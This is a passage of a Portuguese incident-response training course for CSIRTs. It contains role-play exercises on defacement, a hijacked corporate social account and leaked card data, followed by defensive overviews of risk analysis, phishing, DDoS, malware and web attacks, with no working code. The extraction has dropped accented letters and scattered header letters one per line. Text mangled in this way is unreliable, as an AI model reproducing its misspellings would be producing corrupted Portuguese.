http://www.sei.cmu.edu/pub/documents/98.reports/pdf/98hb001.pdf
1 RFC2196 Site Security Handbook: http://www.ietf.org/rfc/rfc2196.txt
1 RFC3013 Recommended Internet Service Provider Security Services and Procedures:
http://www.ietf.org/rfc/rfc3013.txt
1 Site Security Handbook: http://www.ietf.org/rfc/rfc2196.txt
1 Recommended Internet Service Provider Security Services and Procedures:
http://www.ietf.org/rfc/rfc3013.txt
37

C
a
p

t
u
l
o


2

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

2
Roteiro de Atividades 2
Atividade 2.1 Entrevista coletiva
O website da Presidncia da Repblica foi invadido. Na pgina inicial do site http://presidencia.
gov.br, foi possvel observar a seguinte mensagem por aproximadamente 1h.
Esse site foi invadido pelo grupo #BASTA DE CORRUPCAO#. O governo no garante segu-
rana dos dados da populao!
Faa o papel de um jornalista, elaborando cinco questes para uma entrevista coletiva.
1.
2.
3.
4.
5.
Na sequncia, cada CSIRT vai eleger um representante para fazer o papel de representante
do governo, o qual responder os questionamentos das outras equipes.
Atividade 2.2 Contratao
A sua equipe contrataria um profssional que sabidamente j atuou com atividades criminosas
(ex-cracker)?
38

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 2.3 Desligamento
Imagine a seguinte situao: um funcionrio da equipe de TI ser desligado da sua empresa,
pois realizou atos que ferem a poltica de segurana (sabotagem e acessos indevidos).
Quais so os procedimentos que a sua equipe (CSIRT) adotar?
Atividade 2.4 Entrevista de emprego
Elabore trs questes que podem ser utilizadas em uma entrevista de emprego para uma
das seguintes vagas:
1 Analista de cdigo malicioso;
1 Analista de segurana tratamento de incidentes.
Nesta atividade, a equipe entrevistar um candidato para uma vaga de emprego. O instrutor
deste curso responder os seus questionamentos, passando-se por um candidato interessado.
importante fazer questionamentos que possam levantar experincias e perfl do candidato.
a.
b.
c.
Como o seu CSIRT faria para testar as competncias que o candidato diz ter no currculo?
a.
39

C
a
p

t
u
l
o


2

-

R
o
t
e
i
r
o

d
e

A
t
i
v
i
d
a
d
e
s

2
Atividade 2.5 Comunicando-se com a imprensa
Escrever um comunicado para imprensa referente seguinte situao: voc o responsvel
pela rea de mdias sociais da Petrobras. A conta ofcial de uma rede social (Twitter) foi com-
prometida e falsas informaes foram publicadas:
Novo concurso da PETROBRAS. Edital: http://t.co.ppp/Edital.php
Ao acessar esse link, diversos usurios foram comprometidos por um ataque do tipo
driven-by-download. Como a sua equipe lidaria com isso? Escreva um comunicado
para a imprensa.
Atividade 2.6 Avaliao de incidente
Utilizando o seu cdigo de conduta, analise como o seu CSIRT trataria o seguinte caso:
Um servidor de sua responsabilidade foi comprometido. Analisando as informaes con-
tidas no servidor comprometido, encontrou-se um arquivo com informaes bancrias de
diferentes clientes (cartes de crdito). Como o seu CSIRT atuaria nesse caso? Considere
questes como:
Lembre-se: cada grupo responder os questionamentos baseado na rea de atuao.
Exemplo: CSIRT bancrio atuar diferentemente de um CSIRT nacional.
a. A sua equipe deveria notifcar os responsveis pelo comprometimento?
b. A sua equipe notifcaria os bancos? Qual o nvel de detalhe que seria inserida
nessa notifcao?
c. Que implicaes para sua empresa essa notifcao poderia causar?
d. O uso de um CSIRT neutro, como por exemplo o CAIS/RNP ou o CERT.br, poderiam auxi-
liar no processo de notifcar os dados encontrados no seu servidor comprometido?
40

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Atividade 2.7 Procedimentos
a. Como proceder em casos para os quais no exista, no seu CSIRT, algum qualifcado para
analisar o incidente? Lembre-se dos modelos de CSIRT: o modelo misto permite a contra-
tao de consultores temporrios, mas voc pode, ainda, buscar ajuda em outros CSIRTs
com os quais possua laos de confana e em fruns fechados como o FIRST. Considere,
por exemplo, um incidente onde um cdigo malicioso foi encontrando na central telef-
nica da sua instituio (PABX) cujo malware foi projetado para a arquitetura ARM.
b. Qual o procedimento para lidar com notifcaes que o seu CSIRT no considera um inci-
dente se segurana, como por exemplo incidentes fora do escopo de atuao do CSIRT?
Atividade 2.8 Gerenciamento de CSIRT
Por motivos de fora maior, o seu CSIRT ser extinto. Durante dois anos de atuao, a sua
equipe prestou valorosos servios comunidade; no entanto, ter de interromper suas ativi-
dades de forma defnitiva. Considerando esse contexto, responda os questionamentos a seguir:
a. Quais so as principais consequncias para a sua comunidade?
b. Quem vai assumir as responsabilidades do CSIRT para a comunidade de atuao?
41

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
3
Riscos e ameaas
Ter viso de ameaas e riscos associados aos sistemas; Identifcar os principais
incidentes de segurana observados pela comunidade de segurana; Ter cincia das
etapas para o comprometimento de sistemas; Conhecer os conceitos relacionados
com os ataques e ameaas provenientes da internet; Discutir questes relacionadas
ao papel dos atacantes no atual cenrio da segurana.
Anlise de risco e custos de um incidente.


Introduo
q Identifcar as ameaas de segurana e seus respectivos riscos associados faz parte das
premissas bsicas para atuar no processo de resposta de incidentes de segurana.
Um CSIRT deve ter conhecimento das principais categorias de incidentes. Dessa forma,
pode aprimorar os seus procedimentos de modo a responder eventos de segurana de
forma efciente.
q Identifcar ameaas de segurana e caractersticas de ataques permite equipe deter-
minar quais so os incidentes mais danosos infraestrutura da instituio.
E, dessa forma, direcionar melhor os seus recursos de segurana para lidar com os inci-
dentes mais crticos. Isso fundamental, sobretudo, nas etapas iniciais do processo de
resposta a incidentes, onde os incidentes so priorizados e classifcados. Sendo assim,
identifcar previamente os riscos associados a um evento de segurana permite que a
equipe atribua as aes especfcas de investigao.
Este captulo busca apresentar conceitos bsicos relacionados a anlise de riscos e tambm
descreve as principais ameaas, ou seja, os tipos de incidentes frequentemente enfrentados
por equipes de respostas a incidentes. Por questes de organizao, este captulo est estru-
turado em duas partes. Inicialmente so apresentados conceitos relacionados anlise de
risco e, posteriormente, so descritos os principais riscos associados segurana de sistemas.
Anlise de risco
A anlise de risco um tema bastante amplo, onde se busca prover meios para identifcar
potenciais riscos associados a uma determinada ao a ser realizada. No contexto de
resposta a incidentes, a anlise de risco tem um papel fundamental na defnio de aes a
serem tomadas frente a um evento de segurana.
o
b
j
e
t
i
v
o
s
c
o
n
c
e
i
t
o
s
42

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q De certa maneira, um time de resposta de segurana atua diretamente com o gerencia-
mento de riscos associados sua atuao. Em um contexto mais especfco, a anlise de
risco busca estimar os custos associados a cada recurso e os possveis danos causados
aos sistemas computacionais.
Em determinada instituio, por exemplo, o vazamento de informao sensvel (senhas ou
informaes fnanceiras) tem maior risco que a indisponibilidade do sistema de pagamento
e-commerce. Portanto, a identifcao dos custos associados a cada recurso deve considerar
o modelo de negcio da prpria instituio.
O custo de um recurso tipicamente considera fatores como: o prejuzo fnanceiro, tempo
para o restabelecimento e custo para reparado. Adicionalmente, devem-se avaliar os
ativos intangveis. A tabela 3.1 exemplifca alguns recursos:
Recursos tangveis Recursos intangveis
Dados sensveis Reputao
Computadores (servidores e desktops) Integridade de dados
Equipamentos de rede (roteadores e comutadores) Disponibilidade
Softwares comerciais Informaes de configuraes
Arquivos de backup Senhas pessoais
Existem diferentes metodologias para avaliao dos cursos e riscos associados aos
recursos de uma instituio.
q
De forma geral, a anlise pode ser classifca entre avaliao quantitativa ou qualitativa.
A anlise de risco quantitativa representa por nmeros, ou seja, pela quantidade
monetria associada a um risco.
Geralmente essa informao expressa em dlares, ou na moeda local, representando as
perdas fnanceiras anuais atreladas a cada risco. Existe uma frmula que serve para deter-
minar os custos associados a cada anlise de risco.
Risco = Probabilidade x Custo associado
q Evidentemente, determinar a probabilidade e o custo associado de cada item envolve
procedimentos mais elaborados que fogem do escopo deste curso (avaliao de riscos);
no entanto, a tabela a seguir ilustra um exemplo do clculo de risco de determinados
recursos de uma instituio.
Recurso Probabilidade Custo Risco
Destruio de uma base de dados de clientes 0,005 $ 25,000,000 $ 125,000
Inacessibilidade do servidor web. 0,003 $ 38,000,000 $ 114,000
Sistema de cobrana corrompido 0,001 $ 18,000,000 $ 18,000
Comprometimento por malware 0,002 $ 7, 000,000 $ 14,000
Total U$ 271,000
q Outras metodologias de anlise de riscos sugerem a classifcao qualitativa, ou seja, repre-
sentar os riscos associados com o seu respectivo nvel de impacto: alto, baixo ou mdio.
Ativos intangveis:
Recursos que no podem
ser tocados fisicamente,
mas que tambm
possuem valor asso-
ciado instituio, tal
como a sua reputao.
Tabela 3.1
Exemplo de
recursos de uma
instituio.
Tabela 3.2
Anlise de risco
quantitativa.
43

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
Em certos aspectos a classificao qualitativa mais intuitiva e de fcil compreenso.
Na tabela a seguir, por exemplo, a anlise quantitativa recm-apresentada transcrita a
anlise qualitativa.
Recurso Risco
Destruio de uma base de dados de clientes. Alto
Inacessibilidade do servidor web. Alto
Sistema de cobrana corrompido. Mdio
Comprometimento por malware. Baixo
q As duas metodologias para anlise de riscos podem ser aplicadas no contexto de
resposta a incidentes.
Cada qual com as suas vantagens e desvantagens. A anlise quantitativa, por exemplo, con-
siste na ideia de calcular os valores associados a cada risco; no entanto, os valores utilizados
so apenas estimativas e no podem identifcar precisamente o valor de cada risco. Por outro
lado, a anlise qualitativa subjetiva e carece de consistncia na caracterizao dos riscos.
Independentemente do mtodo utilizado para avaliar os riscos, fundamental que os
responsveis pela segurana da instituio consigam identifcar os recursos mais crticos da
instituio e que, em ltima anlise, devem ser protegidos.
Sabe-se que a anlise de risco dinmica. Novas ameaas esto constantemente surgindo,
fazendo com que ameaas antigas tenham o seu impacto potencial reduzido. A equipe do
CSIRT deve constantemente analisar as ltimas ameaas e, tambm, reavaliar a classifcao
dos riscos associados de maneira a tornar preciso o processo de resposta a incidentes.
Os dados relativos anlise de riscos podem ser utilizados em diferentes aspectos de um
CSIRT como, por exemplo, para compor os custos envolvidos com um incidente especfco.
q Nesses casos, estimar os valores associados a um incidente deve considerar todos os
recursos impactados e tambm os diferentes esforos empreendidos para solucionar o
incidente. Na estimativa, devem-se considerar custos diretos e indiretos, tais como:
1 O custo estimado dos profssionais que atuaram na resposta e na investigao do inci-
dente (valor da hora do profssional multiplicado pelo nmero de horas trabalhadas);
1 A quantidade de horas, no total, que cada profssional empregou no incidente em si;
1 A quantidade de pessoas que foram privadas de suas atividades normais em decor-
rncia do incidente de segurana;
1 A quantidade de horas produtivas, no total, que cada uma dessas pessoas impedidas
de trabalhar desperdiou;
1 O custo estimado de cada profssional que fcou impedido de trabalhar.
Os diversos fatores apresentados neste captulo buscam ilustrar os aspectos bsicos da
anlise de risco que podem ser utilizados para determinar os custos associados ao processo
de resposta a incidentes como um todo. Como consequncia, o CSIRT pode identifcar reas
e tipos de incidentes que representam as maiores ameaas para a instituio.
Tabela 3.3
Anlise de risco
qualitativa.
44

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
q 1 Vulnerabilidade: fragilidade inerente de um sistema ou ambiente operacional, que
pode ser explorado para causar dano a um sistema;
1 Ameaa: um agente (pessoal, atividade ou evento) com o potencial de causar dano a
um sistema ou ambiente operacional.
Ameaas associadas a segurana de sistemas
Este captulo descreve as principais ameaas de segurana a sistemas computacionais.
De forma simplifcada, as ameaas aos sistemas podem ser associadas a fatores naturais ou
fatores humanos (vide fgura 3.1). As ameaas relacionadas com fatores naturais compre-
endem aes da natureza, como, por exemplo, tempestades, inundaes, calor excessivo
etc. Como resultado, fatores naturais podem desencadear rompimento de fbra ptica,
queda de energia e mau funcionamento de equipamentos.
Ameaas de segurana
Fatores humanos
Inteno
Externos
(cracker/hacker)
Internos
(funcionrios)
Sem inteno
Erros
Fatores naturais
Terremotos
Furaces
Tornados
As ameaas relacionadas a fatores humanos, em especial, compreendem aes maliciosas ou
erros de utilizao. Um erro de confgurao no frewall da instituio, por exemplo, pode tornar
o acesso instituio indisponvel externamente. Por outro lado, aes mal-intencionadas
podem afetar os recursos de uma instituio de forma direcionada. Alm dos externos
instituio, uma organizao sempre deve considerar ataques originados internamente por
seus prprios funcionrios, tal como roubo de informaes, ataque a recursos crticos e
ataques de engenharia social.
q Em contraponto, os ataques externos tipicamente so executados por atacantes ou
malwares escritos com a inteno de afetar sistemas especfcos vulnerveis. Esses
ataques, em essencial, possuem diferentes motivaes, sendo:
1 Demonstrao de poder;
1 Prestgio;
1 Motivaes fnanceiras;
1 Motivaes ideolgicas;
1 Vantagem competitiva;
1 Vingana;
1 Extorso.
O cenrio de riscos associados a incidentes de segurana atualmente muito distinto.
possvel encontrar incidentes de segurana relacionados a ataques de diferentes nveis
de complexidade. Na sequncia, so apresentadas as principais categorias de incidentes
frequentemente observadas no processo de resposta a incidentes.
Figura 3.1
Diferentes ameaas
de segurana.
45

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
Comprometimento de sistemas
q O comprometimento de um sistema, ou uma invaso, acontece quando um atacante tem
acesso no autorizado a um sistema, passando-se por um usurio legtimo. Geralmente
um comprometimento acontece ao nvel de usurio, onde o atacante tem acesso s
mesmas informaes disponveis a um usurio especfco, como acesso aos arquivos,
acesso a credenciais de acesso, histrico de comandos, histrico de navegao e outros.
Mesmo que dados ou programas no tenham sido alterados ou roubados, um comprome-
timento pode resultar em perdas para a instituio. Por exemplo, quando uma mquina
crtica identifcada como comprometida, necessrio instaurar um processo de investi-
gao que, muitas vezes, tornar o sistema temporariamente indisponvel.
Evidentemente existem vrias maneiras de comprometer um sistema computacional.
q Um atacante pode comprometer um sistema compondo diferentes tcnicas, usando, por
exemplo: engenharia social, arquivos maliciosos e vulnerabilidades de sistemas. Ataques
que exploram vulnerabilidades de aplicaes tipicamente permitem que um atacante
execute comandos arbitrrios no sistema vulnervel.
Dessa maneira, o atacante pode executar as mais diversas aes, como: apagar arquivos,
sobrescrever arquivos executveis e ter acesso ao sistema de forma permanente.
Muitas vezes a efetiva explorao de vulnerabilidades permite acesso restrito ao sistema
atacado, ou seja, acesso no privilegiado. Nesses casos, quando o atacante no capaz de
obter acesso privilegiado de imediato (root ou administrador), necessrio utilizar outras
tcnicas. Tipicamente, uma vez no sistema, os atacantes buscam explorar outras vulnera-
bilidades de modo a escalar privilgios. Isso signifca que outros ataques so executados
localmente at que o atacante tenha acesso privilegiado ao sistema.
q Um comprometimento de sistema muito comum onde se busca a explorao de vul-
nerabilidades e posteriormente a elevao de privilgios ocorre explorando falhas de
aplicaes web.
Atualmente existe grande quantidade de aplicaes web que podem ser facilmente insta-
ladas, como ferramentas de blog, gerenciamento de sistemas, gerenciadores de contedos
e outros. Infelizmente, algumas solues primam pela praticidade e facilidade de instalao
e, muitas vezes, os aspectos de segurana fcam em segundo plano. Falhas na especifcao
ou na implementao desses aplicativos podem permitir que atacantes comprometam o
sistema de diferentes maneiras, incluindo a execuo de programas (malwares), alterando o
contedo de pginas, acessando arquivos e diretrios do sistema e, por fm, obtendo acesso
privilegiado ao sistema.
Sabe-se que um sistema comprometido muito valioso para um atacante. Com acesso total
a um sistema, um atacante pode coletar informaes sensveis de uma instituio e tambm
efetuar os mais diversos tipos de ataques a outras organizaes. A fgura a seguir ilustra
algumas aes que um atacante pode realizar com um sistema comprometido.
46

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
phising
repositrio de malware
dados com copyright
pornograa infantil
spam
servidor web
ataques e-mail
sistema
comprometido
bens virtuais
reputao
webmail
engenharia social
acesso ao e-mail coorporativo
contas de e-mail associadas
personagens de jogos online
recursos de jogos online
licenas de jogos
licenas de sis. operacionais
facebook
twitter
linkedin
google+
phising
propaganda de malware
warez / piracy server
child pornography server
spam site
cartes de crdito
e-commerce
sistemas de pagamento
sistemas de milhagem
webmail institucional
bitcoin / webmoney
phising
paypal / pagseguro
click fraud
facebook
documentos
ickr
instagram
malware
credenciais
nanceiro
sequestro info.
Phishing
q Phishing uma tcnica utilizada por golpistas cujo objetivo obter informaes
fnanceiras ou pessoais da vtima.
Dessa maneira, os golpistas podem obter ganhos fnanceiros, ou ainda, valer-se de dados
pessoais para tirar vantagem pessoal tal como: roubo de identidade e uso das informaes
para lanar novos ataques personalizados.
Os ataques de phishing mais conhecidos so os quais um atacante induz usurios a acessar
um site clonado de uma instituio fnanceira, de modo a coletar suas credenciais de acesso.
No entanto, existem mais sofsticados, onde um usurio induzido a instalar um programa
malicioso com o objetivo de coletar dados sensveis do sistema.
q Alm dos phishings voltados para instituies fnanceiras, um conjunto de servios
igualmente visado:
1 Credenciais de servios: e-mails, redes sociais ou armazenamento;
1 Programas de milhagem (companhias areas ou redes de supermercados);
1 Comrcio eletrnico;
1 Notifcaes de multas, dbitos ou compras;
1 Webmail corporativo.
Para isso, os atacantes fazem uso de diferentes tcnicas, de modo a induzir um usurio a
fornecer os seus dados pessoais inadvertidamente.
q Entre as principais tcnicas utilizas em ataques de phishing, podemos citar:
1 Modifcaes nos links de redirecionamento embutidos na mensagem;
1 E-mails baseados em HTML, utilizando ofuscao de informao da URL;
1 Incluindo encurtadores de URLs;
1 Mensagens personalizadas, incluindo dados pessoais como nome completo e CPF;
1 Mensagens falsas, usando cabealhos das mensagens alterados (From).
O grupo de resposta CAIS/RNP mantm um catlogo de fraudes relacionado a institui-
es brasileiras, sendo possvel obter exemplos reais de fraudes utilizadas por golpistas:
http://www.rnp.br/cais/fraudes.php
Figura 3.2
Possveis abusos
a sistemas
comprometidos.
47

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
Desfigurao
q A desfgurao de site, ou web defacement, um ataque cujo objetivo alterar sem
autorizao o contedo de uma pgina web.
A alterao de uma pgina, em ltima anlise, representa um comprometimento do sistema.
Afnal, a alterao do contedo de uma pgina envolve a escrita no sistema de arquivo da
prpria mquina.
q Sendo assim, um ataque de desfgurao pode trazer srias consequncias instituio,
entre elas:
1 Constrangimento: uma instituio que tem sua pgina web alterada inadvertidamente
pode ter sua imagem de confabilidade afetada. J um website constantemente com-
prometido pode refetir o descaso com que as informaes crticas de uma instituio
so tratadas;
1 Disseminao de inverdades: alteraes sutis no website podem resultar em conse-
quncias negativas para a instituio. Por exemplo, alterao de preos de produtos,
telefones de contato ou editar um comunicado para a imprensa podem trazer
inmeros prejuzos;
1 Prejuzos de servios: a alterao de um site pode indisponibilizar servios pres-
tados pela instituio.
Boa parte dos ataques do tipo defacement realizada de forma automatizada. Existem
ferramentas especializadas em identifcar aplicaes web populares vulnerveis tal como
Wordpress e Joomla de modo a explorar falhas de segurana e alterar o contedo da
pgina. Portanto, em cenrios onde aplicaes de gerenciamento de contedo so utili-
zados, fundamental redobrar os cuidados de segurana mantendo o sistema atualizado.
Ataques de fora bruta
um tipo de ataque onde se busca descobrir as credenciais de acesso a um sistema atravs
de tentativas. Para isso, um atacante utiliza diferentes palavras como possveis senhas para
identifcar a combinao correta de usurio e senha.
q Existem diferentes tcnicas para compor as credenciais a serem testadas nos sistemas.
As mais conhecidas so:
1 Busca exaustiva: nesse tipo de ataque, todas as possibilidades so testadas.
Por exemplo, a combinao de todos os caracteres de um alfabeto com diferentes
tamanhos de senhas;
1 Ataque de dicionrio: as palavras utilizadas para o ataque so oriundas de dicion-
rios especfcos, ou seja, um subconjunto de palavras, tal como palavras de um idioma
especfco ou ainda as senhas mais comuns.
Todos os mtodos criptogrfcos de autenticao baseados em senhas so vulnerveis a
esses tipos de ataques. A viabilidade de tais ataques depende basicamente da quantidade
de recursos disponveis para o atacante, que pode acelerar o processo, realizando vrios
testes em paralelo.
Para evitar esse tipo de ataque, determinadas aplicaes implementam polticas de pro-
teo. Por exemplo, limitando o nmero de tentativas por usurio ou ainda implementando
mecanismos que impedem a automatizao das tentativas, como o captcha.
Captcha:
Teste de Turing pblico
completamente auto-
matizado para distinguir
computadores de seres
humanos. Tambm so
conhecidos como um
tipo de prova intera-
tiva humana (Human
Interaction Proof - HIP).
Geralmente, gerada
uma imagem com vrias
letras distorcidas no
formulrio de um site.
O usurio ento precisa
digitar a srie correta
de letras em um campo,
para provar que no
uma mquina tentando
burlar o sistema.
48

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Varredura em redes (Scan)
q Scan, ou varredura, uma tcnica utilizada para mapear informaes de sistemas
computacionais. Existem diferentes tipos de varreduras que podem ser utilizadas
para obter informaes detalhadas de recursos, tal como: servios sendo executados;
sistemas ativos; verses de aplicaes; e, at mesmo, identifcar vulnerabilidades em
sistemas-alvo. Para isso, existe um conjunto de ferramentas especializadas na tarefa de
identifcao, varredura e enumerao de servios disponveis:
1 Port Scanner: buscam informaes de portas abertas em servidores;
1 Network Enumerator: identifca servidores acessveis;
1 Network Vulnerability Scanner: vulnerabilidade em servios e redes;
1 Web application security scanner: vulnerabilidades em aplicaes web.
Quando no autorizada, uma varredura potencialmente considerada maliciosa.
Sabe-se que uma das etapas para o comprometimento de um sistema elencar informa-
es sobre o alvo (servios, Sistema Operacional e suas respectivas verses). Logo, uma
varredura pode ser uma etapa inicial de um possvel ataque ou, ainda, ser ocasionado por
um atacante tentando identifcar possveis alvos vulnerveis.
Negao de servio (DoS e DDoS)
q Um DoS negao de servio um ataque cujo objetivo tornar o sistema
computacional inacessvel.
Tipicamente, um ataque de negao de servio tem como alvo servidores web, mas podem
tambm alvejar servidores de e-mail, servidores de nomes (DNS) e outro tipos de servios.
q O ataque consiste em exaurir recursos de um alvo a fm de torn-lo inacessvel. Na prtica,
uma negao de servio sobrecarrega um alvo fazendo grande quantidade de requisies.
Essas requisies podem ser pacotes de dados simples ou uma srie de requisies custo-
mizadas. Para que o ataque tenha sucesso necessrio sobrecarregar algo com recursos.
Quando o alvo atacado no consegue processar o volume de requisies ou ainda a banda
de rede tenha sido exaurida, o alvo fca inacessvel.
q Um engano comum assumir que um ataque de negao de servio altera a integridade
dos dados, ou seja, que compromete o sistema atacado.
Portanto, um ataque de negao de servio destinado a um servio de banco de dados no
afetar a base de informaes do servidor, mas sim o acesso ao servio.
Uma negao de servios pode ser inicializada por uma nica mquina, mas tipicamente
realizada utilizando mltiplas mquinas de forma coordenada. Um ataque de negao
usando mltiplas mquinas atacando um nico alvo leva o nome de ataque de negao de
servios distribudo, ou D.D.o.S. A Figura 3.3 ilustra uma negao de servios distribuda.
49

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
Nos ltimos anos, os ataques de negao de servio tornaram-se populares. Como comen-
tado, por utilizarem grande quantidade de mquinas tipicamente comprometidas esses
ataques so muito efcazes.
Sites como Twitter, Visa e PayPal j foram afetados por ataques de negao de servio.
Em alguns contextos, no entanto, o ataque de negao de servio pode ser realizado como
um recurso de ciberativismo. Nesses casos, no so utilizadas mquinas comprometidas,
mas sim voluntrios. No ano de 2012, um grupo de ativistas ou um coletivo denominado
Anonymous ganhou notcia por atacar diversos websites utilizando tcnicas de negao de
servio distribudas (D.D.o.S). Esses ataques, na sua maioria considerada como ciberati-
vismo, foram lanados contra diferentes instituies fnanceiras e tambm contra rgos
governamentais. Para isso, algumas ferramentas foram utilizadas por voluntrios de forma
a atacar os alvos. Uma das ferramentas mais utilizadas pelo Anonymous foi a ferramenta
Low Orbit Ion Cannon (LOIC) e suas variaes, que disparavam muitas requisies a um
website especfco.
Figura 3.3
Negao de
servio distribuda:
mltiplas mquinas.
Figura 3.4
Vida de
Programador
50

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Malwares
q Malware um nome genrico para defnir os diferentes tipos de cdigos maliciosos.
So softwares desenvolvidos especifcamente para causar danos aos sistemas, incluindo
computadores, redes ou at mesmo em dados.
A denominao malware comumente empregada para se referir a vrus, worms, spywares,
trojans em geral e todo e qualquer software potencialmente malicioso.
Existem diferentes formas de um malware comprometer um sistema. Malwares podem
infectar sistemas embutindo-se em programas, anexando-se em mensagens de e-mails e pro-
pagando-se automaticamente. Outros malwares, porm, so instalados explorando vulnerabi-
lidades conhecidas em um Sistema Operacional ou em outros softwares, tal como um browser
vulnervel que acessa um website com um applet malicioso. A grande maioria dos malwares,
entretanto, executada por usurios incautos induzidos a instalar programas legtimos.
q Na sequncia, so descritos os principais tipos de malwares amplamente encontrados
na rede.
Vrus
q Os vrus so programas com a capacidade de autorreplicao, que se propagam atravs
da ao do usurio. Uma vez executados, fazem cpias de si mesmos buscando espa-
lhar-se para outros sistemas.
Geralmente os vrus infectam sistemas de arquivos, aplicaes e macros de programas.
Atualmente, no entanto, os vrus no so muito notveis. Em parte, isso se deve ferramentas
de antivrus que impedem a propagao dos vrus e tambm mudana de motivao dos
desenvolvedores de vrus.
Trojans
q um tipo de software que aparenta ser legtimo, mas na realidade um malware
projetado para comprometer um Sistema Operacional.
Um trojan tenta enganar um usurio disponibilizando funcionalidades desejadas, no
entanto, alm de realizar as funcionalidades desejadas, o trojan contm funes mali-
ciosas que so executadas quando o software executado.
Tipicamente, aps a sua execuo, um trojan realiza uma srie de aes. Entre as aes
desempenhadas por um trojan est o download de novos malwares para o sistema e a ins-
talao de novas funcionalidades maliciosas, tal como ferramentas de negao de servio,
propaganda, envio de spams, armazenamento de teclas digitadas e outras.
q Alguns exemplos de trojans:
1 Cracker: ferramenta para ativar softwares que, alm de ativar o software, compro-
mete o sistema, instalando novos malwares;
1 Plug-ins: software que tenta passar por um plug-in (fash, segurana bancria) para
ter acesso ao sistema;
1 Proteo de tela: arquivos do tipo .scr que instalam uma proteo de tela, mas
tambm comprometem o sistema;
1 Jogos: pequenos jogos gratuitos que quando executados comprometem o sistemas.
51

C
a
p

t
u
l
o


3

-

R
i
s
c
o
s

e

a
m
e
a

a
s
Os trojans so ainda mais efetivos quando executados com privilgios de administradores
de sistema. Dessa forma, mdulos de funcionalidades maliciosas podem ser inseridos no
Sistema Operacional base.
q Ao contrrio dos vrus e worms, os trojans no infectam computadores usando tcnicas
de autorreplicao.
Necessitam da ao de um usurio para propagar-se para outros sistemas. Comumente so
encontrados em anexos de e-mails e em sites falsos que tentam enganar a boa-f do usurio.
Worms
q Diferentemente dos vrus, um worm no necessita de uma ao do usurio para autorre-
plicar-se. Alm de fazer cpias de si mesmo, os worms tm a capacidade de propagar-se
para outros sistemas explorando vulnerabilidades existentes nos mesmos sistemas.
Adicionalmente, os worms podem ter outras fontes de propagao, tal como: anexar-se a
mensagens de e-mails; propagar-se em compartilhamento de redes; enviar-se em pro-
gramas de mensagens instantneas; e at mesmo utilizar redes sociais para se propagar.
Mesmo no alterando arquivos do computador, como os vrus, os worms tipicamente
consomem recursos do sistema, como memria, espao em disco e uso de rede, inviabili-
zando muitas vezes a operao normal do Sistema Operacional. Por exemplo, o primeiro
worm de que se tem notcia, o Moris Worm, utiliza vulnerabilidades dos servios sendmail,
fnger e rsh para autopropagar-se. Outro caso notvel de malware foi o worm ILOVEYOU,
que infectou milhes de mquinas enviando cpias de si mesmo para a lista de contatos
da mquina comprometida.
Backdoor
q um software que permite acesso a um computador sem usar os mecanismos de
autenticao presentes no sistema.
Geralmente, os malwares do tipo backdoor so utilizados por atacantes para garantir o seu
retorno ao sistema comprometido de forma direta, sem a necessidade de explorar novamente
vulnerabilidades ou utilizar senhas de usurios previamente identifcadas.
Muitas vezes um atacante substitui um programa de acesso remoto por um novo programa
malicioso. Por exemplo, em alguns comprometimentos observa-se que os atacantes alteram
o software SSH (sshd) para um sshd alterado. Dessa forma, o acesso de um determinado
usurio ser sempre permitido mesmo sem o usurio estar presente no sistema.
Figura 3.5
CUIDADO!!!
Em um passado
recente, alguns worms
como o Code Red
caracterizavam-se por
instalar backdoors em
mquinas comprome-
tidas. Malwares como o
worm Nimda, por
exemplo, utilizavam o
backdoor deixado pelo
Code Red como uma
forma de propagao.
l
52

T
r
a
t
a
m
e
n
t
o

d
e

I
n
c
i
d
e
n
t
e
s

d
e

S
e
g
u
r
a
n

a
Alguns fabricantes de software inserem de forma proposital backdoors em seus sistemas,
sob a alegao de necessidades administrativas. No entanto, um backdoor no sistema
mesmo sendo considerado legtimo uma ameaa segurana do Sistema Operacional e
tambm para a rede como um todo. Uma vez que sejam identifcados os requisitos para o
uso do backdoor, este pode ser utilizado para as aes maliciosas.
Ataques a servios web
O ataque a aplicaes web uma das principais maneiras de comprometer sistemas com-
putacionais. Como se sabe, muitas aplicaes foram portadas para a web, mas nem todas
observam com rigor os requisitos mnimos de segurana. Esse cenrio potencializado
com massifcao de solues stand alone, que podem ser utilizadas para as mais diversas
tarefas, tal como gerenciador de contedo online, gerenciamento de fruns web e frond-ends
para gerenciamento. O problema no est em usar solues prontas, mas sim na utilizao
destas sem a preocupao de segurana. muito comum observar essas ferramentas
sendo executadas sem a correta confgurao de segurana e sem as devidas correes de
vulnerabilidades conhecidas (paths de segurana).
q A explorao de uma vulnerabilidade de uma aplicao web permite a um atacante ter
acesso rea do servidor que, muitas vezes, atravs da elevao de privilgios, pode dar
acesso administrativo ao atacante. Mesmo sem acesso de administrador, um atacante
pode alterar o contedo de uma pgina web (defacement) e realizar os mais diversos
tipos de ataques, como por exemplo:
1 Inserir um link malicioso em uma pgina fazendo com que todos que acessarem a
pgina alterada sejam direcionados para efetuar um download de um arquivo mali-
cioso (driven-by-download);
1 Substituir os arquivos existentes por pginas falsas de bancos utilizadas em ataques
de phishing;
1 Expor dados sensveis armazenados na base de dados do servidor usando as mesmas
credenciais da aplicao (sql injection).
As possveis vulnerabilidades de aplicaes web so as mais diversas, podendo ir de
